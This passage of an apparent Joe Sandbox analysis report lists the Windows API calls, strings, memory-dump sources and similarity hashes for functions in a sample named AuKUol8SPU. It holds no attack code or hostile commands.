EnableWindow.USER32(00000000,00000000), ref: 00B9B736
ShowWindow.USER32(00BD57B0,00000000,01705AD0,?,?,00BD57B0,?,00B9B5A8,?,?), ref: 00B9B796
ShowWindow.USER32(00000000,00000004,?,00B9B5A8,?,?), ref: 00B9B7A8
EnableWindow.USER32(00000000,00000001), ref: 00B9B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B9B7EF

Strings

@U=u, xrefs: 00B9B7EF

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: @U=u
API String ID: 642888154-2594219639
Opcode ID: 4c26ceb374f9c63661a8a56269d4d8297deeace258dd5f28e1daed74ac67a9ee
Instruction ID: b72d1e3b9f979ef263234ba49d30ae2d68cf641cc20e1d8fa3b8126f71e34373
Opcode Fuzzy Hash: 4c26ceb374f9c63661a8a56269d4d8297deeace258dd5f28e1daed74ac67a9ee
Instruction Fuzzy Hash: A5419035601240AFDF21CFA4E689FA07BE1FB85310F1842F9E9488F2A2C735AC56CB50

Function 00B72F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B73033

Strings

stop, xrefs: 00B73004
question, xrefs: 00B72FEC
info, xrefs: 00B72FD4
blank, xrefs: 00B72FB5
warning, xrefs: 00B7301C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 4b9db3dca8d590c3bdaed51c4235966e7bff747bfd14b110b3d8e33ef2f562ed
Instruction ID: dd93649114a750d25a49226fac1baa966ac2d2c4171bd589d928ddec09777851
Opcode Fuzzy Hash: 4b9db3dca8d590c3bdaed51c4235966e7bff747bfd14b110b3d8e33ef2f562ed
Instruction Fuzzy Hash: 7A112731348396BEE7149B54DC82EAB77DCDF25760F2080EEF918A6281DBB05F4066A4

Function 00B742F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B74312
LoadStringW.USER32(00000000), ref: 00B74319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B7432F
LoadStringW.USER32(00000000), ref: 00B74336
_wprintf.LIBCMT ref: 00B7435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B7437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B74357

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 078cc2f475f9de47035f6d1243be5cb168ab4f6a24802629912243ede7f71e7e
Instruction ID: da24ddaee72ea10119c94f550ed7e5e2362936b50bda7596131a2ea5cbbe452f
Opcode Fuzzy Hash: 078cc2f475f9de47035f6d1243be5cb168ab4f6a24802629912243ede7f71e7e
Instruction Fuzzy Hash: 9B018FF3900209BFE71097A0DE89EF673ACDB08711F0000B2B709E7011EA309E848B74

Function 00B12A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B4C1C7,00000004,00000000,00000000,00000000), ref: 00B12ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00B12B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B4C1C7,00000004,00000000,00000000,00000000), ref: 00B4C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B4C1C7,00000004,00000000,00000000,00000000), ref: 00B4C286

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f7cf0b587070fcf363cd6fea079d306394ffa869b225f21e575937521d0f0078
Instruction ID: 531973af0389e886183db147f485a06b6aef4d475eb06bf13adfee5ff86b6474
Opcode Fuzzy Hash: f7cf0b587070fcf363cd6fea079d306394ffa869b225f21e575937521d0f0078
Instruction Fuzzy Hash: 6E411D31219B809AC7754B288DC8BFB7FD1EF45310F9484EAE04783560CAB599E1D720

Function 00B770C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B770DD

Part of subcall function 00B30DB6: std::exception::exception.LIBCMT ref: 00B30DEC
Part of subcall function 00B30DB6: __CxxThrowException@8.LIBCMT ref: 00B30E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B77114
EnterCriticalSection.KERNEL32(?), ref: 00B77130
_memmove.LIBCMT ref: 00B7717E
_memmove.LIBCMT ref: 00B7719B
LeaveCriticalSection.KERNEL32(?), ref: 00B771AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B771BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B771DE

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 966da11ae2fba745845fc03473cb2ecdf3ff38f6ac63e9f19c301cc08e10bd3f
Instruction ID: 359eb47e04f64ea14476a9be0a779bf929912626265617d08fb05b4320940564
Opcode Fuzzy Hash: 966da11ae2fba745845fc03473cb2ecdf3ff38f6ac63e9f19c301cc08e10bd3f
Instruction Fuzzy Hash: F7315231A00215EBDF10EFA5DD85AAE77B8EF45710F2481B6F904EB256DB309E14CBA0

Function 00B7EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

Part of subcall function 00B2FC86: _wcscpy.LIBCMT ref: 00B2FCA9

_wcstok.LIBCMT ref: 00B7EC94
_wcscpy.LIBCMT ref: 00B7ED23
_memset.LIBCMT ref: 00B7ED56

Strings

X, xrefs: 00B7ED93

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 32e7af237423ace0af94ed6c012bb676fdd2b6143c66598b0b3d0929ad472c8f
Instruction ID: cf8b2aab520a124c4a8c1da353fb1d1b2bdee88ddab2ac32c9b80d1be6476590
Opcode Fuzzy Hash: 32e7af237423ace0af94ed6c012bb676fdd2b6143c66598b0b3d0929ad472c8f
Instruction Fuzzy Hash: 6CC175715083419FC764EF24C851A9AB7F4FF89310F5089ADF8A99B261DB30ED45CB92

Function 00B86B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B86C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B86C21
WSAGetLastError.WSOCK32(00000000), ref: 00B86C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00B86CEA
inet_ntoa.WSOCK32(?), ref: 00B86CA7

Part of subcall function 00B6A7E9: _strlen.LIBCMT ref: 00B6A7F3
Part of subcall function 00B6A7E9: _memmove.LIBCMT ref: 00B6A815

_strlen.LIBCMT ref: 00B86D44
_memmove.LIBCMT ref: 00B86DAD

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: e912d3d575c218228e248ecfd3a777b1fdf80bd42646dd80b96b5d51e0b65b6d
Instruction ID: 823d8684cdeea6ac73a60c094a62993908a9e519417cd24a5b7ab94c2047d640
Opcode Fuzzy Hash: e912d3d575c218228e248ecfd3a777b1fdf80bd42646dd80b96b5d51e0b65b6d
Instruction Fuzzy Hash: 5481D071204300ABC710FF24CC96EABB7E8EF84714F5049ADF9559B2A2DA70ED45CB92

Function 00B11424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72df2f51c7a631735f9f92ff9166c24f33f18fc2368e125e07abab15dc3737e0
Instruction ID: f7050dc33a276397592529406f966fd67bea5d4afe7b8dc17626ea290acbee1e
Opcode Fuzzy Hash: 72df2f51c7a631735f9f92ff9166c24f33f18fc2368e125e07abab15dc3737e0
Instruction Fuzzy Hash: F1715C70900109EFCB048F59CC85EFEBBB9FF85310F548599FA15AA251C734AA91CFA4

Function 00B8F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B8F448
_memset.LIBCMT ref: 00B8F511
ShellExecuteExW.SHELL32(?), ref: 00B8F556

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

Part of subcall function 00B2FC86: _wcscpy.LIBCMT ref: 00B2FCA9

GetProcessId.KERNEL32(00000000), ref: 00B8F5CD
CloseHandle.KERNEL32(00000000), ref: 00B8F5FC

Strings

@, xrefs: 00B8F525

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: ffff6c4452db7ee1d14c76fe20d22785385fedd49161050f9326560b6daa4a63
Instruction ID: 8771404ec96ee2bd9ec08b74bbe08dd97db77ef8f3d3a88fd5d24966380c8836
Opcode Fuzzy Hash: ffff6c4452db7ee1d14c76fe20d22785385fedd49161050f9326560b6daa4a63
Instruction Fuzzy Hash: FA618075A0061A9FCB14EF64C4919AEB7F5FF49310F5480A9E855AB361CB30AE41CB90

Function 00B70F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B70F8C
GetKeyboardState.USER32(?), ref: 00B70FA1
SetKeyboardState.USER32(?), ref: 00B71002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B71030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B7104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B71095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B710B8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 142d34e9e26c1c5fdf627899bd970ed23aaf2924081d22304a8ff2906a3cc87a
Instruction ID: db782a104ba320ba632a7a6ece9f10f73b9d7fb2dd8537ae1640f72d6a3c066d
Opcode Fuzzy Hash: 142d34e9e26c1c5fdf627899bd970ed23aaf2924081d22304a8ff2906a3cc87a
Instruction Fuzzy Hash: 0B51D3605147D57DFB36563C8C05BBABEE9DB06304F08C9CAE1E89A8C3C2A89CD4D761

Function 00B70D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B70DA5
GetKeyboardState.USER32(?), ref: 00B70DBA
SetKeyboardState.USER32(?), ref: 00B70E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B70E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B70E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B70EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B70EC9

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 91792a35c5d02addb6edb5049801bf0d6b02f3f600e6ac3d821da661a69b040b
Instruction ID: 1640800467c0027736aac3b35d77f24898c0f5cf3aa7f51609a77db0f5b8097c
Opcode Fuzzy Hash: 91792a35c5d02addb6edb5049801bf0d6b02f3f600e6ac3d821da661a69b040b
Instruction Fuzzy Hash: 1B51E7A09247D5BDFB32A7648C45B7ABED9DB06300F08C8CAE1EC464C2D395AC94D760

Function 00B755FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B7560A
_wcsncpy.LIBCMT ref: 00B7563F
_wcsncpy.LIBCMT ref: 00B75671
_wcsncpy.LIBCMT ref: 00B756A4
_wcsncpy.LIBCMT ref: 00B756E6
_wcsncpy.LIBCMT ref: 00B75720
_wcsncpy.LIBCMT ref: 00B7574F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 3c4e0eecbf258f674406e78c901ffb11c3982e7d24233e5e0eda59b4f8686949
Instruction ID: 8bbbbb7ff96b44daf3cdefcc213ffe1422e83e89788a610b550b0a0cb2d83a63
Opcode Fuzzy Hash: 3c4e0eecbf258f674406e78c901ffb11c3982e7d24233e5e0eda59b4f8686949
Instruction Fuzzy Hash: 9C419275D1061476CB15EBB48C869CFB3FC9F04310F6089A6E518E3221FB74E655C7AA

Function 00B9A056 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

@U=u, xrefs: 00B9A14F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: 8c7a1edf293416a2e7f8d48671045f67128b34a5277e76705f97bf0a60ad8485
Instruction ID: 3353fa1c07d950ec677504013074a398b16842097f1080a26ee055578901b23d
Opcode Fuzzy Hash: 8c7a1edf293416a2e7f8d48671045f67128b34a5277e76705f97bf0a60ad8485
Instruction Fuzzy Hash: 6E41A435905124AFDB20DF28CC99FA9BBE4EB0A320F1541B6F915F72E1DB30AD41DA91

Function 00B73671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B73697,?), ref: 00B7468B

Part of subcall function 00B7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B73697,?), ref: 00B746A4

lstrcmpiW.KERNEL32(?,?), ref: 00B736B7
_wcscmp.LIBCMT ref: 00B736D3
MoveFileW.KERNEL32(?,?), ref: 00B736EB
_wcscat.LIBCMT ref: 00B73733
SHFileOperationW.SHELL32(?), ref: 00B7379F

Strings

\*.*, xrefs: 00B7372D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: ab591cb1af546f3835771e7e988048849d64c786980a1051bd400cea1914e6f4
Instruction ID: 48d87336f2704c324a00bae84c2c5e2c5ed5fbdcbfdaef01f446206bf3386917
Opcode Fuzzy Hash: ab591cb1af546f3835771e7e988048849d64c786980a1051bd400cea1914e6f4
Instruction Fuzzy Hash: 3641B17110C345AEC751EF64C4419DFB7E8EF88780F1048AEB0AAC3251EB34D689C752

Function 00B97291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B972AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B97351
IsMenu.USER32(?), ref: 00B97369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B973B1
DrawMenuBar.USER32 ref: 00B973C4

Strings

0, xrefs: 00B9729E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: f4a84a397aff9ca80816101deb760b11ce31a6c5c87d24ef967fe245b9ecfa49
Instruction ID: e5ff0973b4b94c33ce0029be457243c79e39d6690c19292f6904193e241046fc
Opcode Fuzzy Hash: f4a84a397aff9ca80816101deb760b11ce31a6c5c87d24ef967fe245b9ecfa49
Instruction Fuzzy Hash: 27412675A58209EFDF20DF50D884EAABBF8FB05360F1484AAFD0597250DB31AD51EB60

Function 00B90FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B90FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B90FFE
FreeLibrary.KERNEL32(00000000), ref: 00B910B5

Part of subcall function 00B90FA5: RegCloseKey.ADVAPI32(?), ref: 00B9101B
Part of subcall function 00B90FA5: FreeLibrary.KERNEL32(?), ref: 00B9106D
Part of subcall function 00B90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B91090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B91058

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: e2e2b03fe0d60ffb1b430437c6fcbadbb806c87d6f3700686da8a1f194844118
Instruction ID: c421bfa9fe100f50ddf36206feec80dcba98bc3b3f4c12abb1af5f145de37b86
Opcode Fuzzy Hash: e2e2b03fe0d60ffb1b430437c6fcbadbb806c87d6f3700686da8a1f194844118
Instruction Fuzzy Hash: 2331F97190110ABFDF159FA4DC89AFEB7BCEF08310F0045BAE511E2151EA759E85ABA0

Function 00B6DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B6DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B6DB54
SysAllocString.OLEAUT32(00000000), ref: 00B6DB57
SysAllocString.OLEAUT32(?), ref: 00B6DB75
SysFreeString.OLEAUT32(?), ref: 00B6DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00B6DBA3
SysAllocString.OLEAUT32(?), ref: 00B6DBB1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

